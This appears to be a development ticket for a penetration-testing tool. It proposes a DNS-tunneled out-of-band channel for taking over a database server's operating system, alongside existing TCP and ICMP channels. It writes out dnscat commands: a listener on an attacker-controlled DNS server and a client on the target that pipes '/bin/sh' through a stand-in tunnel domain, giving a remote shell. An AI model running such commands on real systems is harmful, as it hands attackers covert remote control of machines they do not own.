Out-of-band DNS channel for OS takeover

[bdamele]

We have already got OOB database server takeover via TCP (using Metasploit payloads: shell, Meterpreter, VNC), via ICMP (using icmpsh). It is time to implement out-of-band via DNS.

DNS tunneling as a Metasploit shellcode: http://www.skullsecurity.org/blog/?p=611. Details about dnscat: http://www.skullsecurity.org/wiki/index.php/Dnscat.

Example of string on the authoritative DNS server for tun.yourdomain.org: sudo ./dnscat --listen

Example of string of the client (target system): ./dnscat --domain tun.yourdomain.org --exec "/bin/sh"

Type commands on the authoritative DNS server for tun.yourdomain.org where you launched dnscat, they will be executed on the client (target system) and standard output shown inline.